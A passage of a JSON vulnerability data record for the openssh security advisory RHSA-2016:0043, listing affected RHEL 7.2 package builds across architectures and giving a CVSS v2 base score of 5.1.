"7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2016:0043" } ], "scores": [ { "cvss_v2": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, "products": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", 